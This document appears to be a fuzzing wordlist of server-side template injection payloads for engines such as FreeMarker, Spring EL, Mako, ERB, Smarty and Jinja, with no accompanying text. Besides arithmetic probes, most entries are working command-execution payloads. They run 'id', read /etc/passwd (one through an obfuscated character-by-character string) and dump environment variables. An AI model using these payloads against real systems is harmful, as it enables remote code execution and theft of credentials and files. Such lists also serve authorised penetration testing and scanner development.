42*42 #{ 3 * 3 } #{3*3} #{ 7 * 7 } #{7*7} #{42*42} ${3*3} ${6*6} ${7*7} ${42*42} ${"freemarker.template.utility.Execute"?new()("id")} ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')} ${T(java.lang.System).getenv()} ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())} ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}${self.module.cache.util.os.system("id")} ${donotexists|42*42} ${self.__init__.__globals__['util'].os.system('id')} ${self.attr._NSAttr__parent.module.cache.compat.inspect.os.system("id")} ${self.attr._NSAttr__parent.module.cache.util.os.system("id")} ${self.attr._NSAttr__parent.module.filters.compat.inspect.os.system("id")} ${self.attr._NSAttr__parent.module.runtime.compat.inspect.os.system("id")} ${self.attr._NSAttr__parent.module.runtime.exceptions.util.os.system("id")} ${self.attr._NSAttr__parent.module.runtime.util.os.system("id")} ${self.attr._NSAttr__parent.template.module.cache.util.os.system("id")} ${self.attr._NSAttr__parent.template.module.runtime.util.os.system("id")} ${self.context._with_template._mmarker.module.cache.util.os.system("id")} ${self.context._with_template._mmarker.module.runtime.util.os.system("id")} ${self.context._with_template.module.cache.compat.inspect.os.system("id")} ${self.context._with_template.module.cache.util.os.system("id")} ${self.context._with_template.module.filters.compat.inspect.os.system("id")} ${self.context._with_template.module.runtime.compat.inspect.os.system("id")} ${self.context._with_template.module.runtime.exceptions.util.os.system("id")} ${self.context._with_template.module.runtime.util.os.system("id")} ${self.module.cache.compat.inspect.linecache.os.system("id")} ${self.module.cache.compat.inspect.os.system("id")} ${self.module.cache.util.compat.inspect.linecache.os.system("id")} ${self.module.cache.util.compat.inspect.os.system("id")} ${self.module.filters.compat.inspect.linecache.os.system("id")} ${self.module.filters.compat.inspect.os.system("id")} ${self.module.runtime.compat.inspect.linecache.os.system("id")} ${self.module.runtime.compat.inspect.os.system("id")} ${self.module.runtime.exceptions.compat.inspect.linecache.os.system("id")} ${self.module.runtime.exceptions.compat.inspect.os.system("id")} ${self.module.runtime.exceptions.traceback.linecache.os.system("id")} ${self.module.runtime.exceptions.util.compat.inspect.os.system("id")} ${self.module.runtime.exceptions.util.os.system("id")} ${self.module.runtime.util.compat.inspect.linecache.os.system("id")} ${self.module.runtime.util.compat.inspect.os.system("id")} ${self.module.runtime.util.os.system("id")} ${self.template.__init__.__globals__['os'].system('id')} ${self.template._mmarker.module.cache.compat.inspect.os.system("id")} ${self.template._mmarker.module.cache.util.os.system("id")} ${self.template._mmarker.module.filters.compat.inspect.os.system("id")} ${self.template._mmarker.module.runtime.compat.inspect.os.system("id")} ${self.template._mmarker.module.runtime.exceptions.util.os.system("id")} ${self.template._mmarker.module.runtime.util.os.system("id")} ${self.template.module.cache.compat.inspect.linecache.os.system("id")} ${self.template.module.cache.compat.inspect.os.system("id")} ${self.template.module.cache.util.compat.inspect.os.system("id")} ${self.template.module.cache.util.os.system("id")} ${self.template.module.filters.compat.inspect.linecache.os.system("id")} ${self.template.module.filters.compat.inspect.os.system("id")} ${self.template.module.runtime.compat.inspect.linecache.os.system("id")} ${self.template.module.runtime.compat.inspect.os.system("id")} ${self.template.module.runtime.exceptions.compat.inspect.os.system("id")} ${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")} ${self.template.module.runtime.exceptions.util.os.system("id")} ${self.template.module.runtime.util.compat.inspect.os.system("id")} ${self.template.module.runtime.util.os.system("id")} ${{3*3}} ${{7*7}} ${{<%[%'"}}%\ *{7*7} *{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())} <#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")} <%= 3 * 3 %> <%= 7 * 7 %> <%= 7*7 %> <%=42*42 %> <%= File.open('/etc/passwd').read %> @(1+2) @(6+5) [7*7] [#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')} [[${42*42}]] {42*42} {$smarty.version} {% for key, value in config.iteritems() %}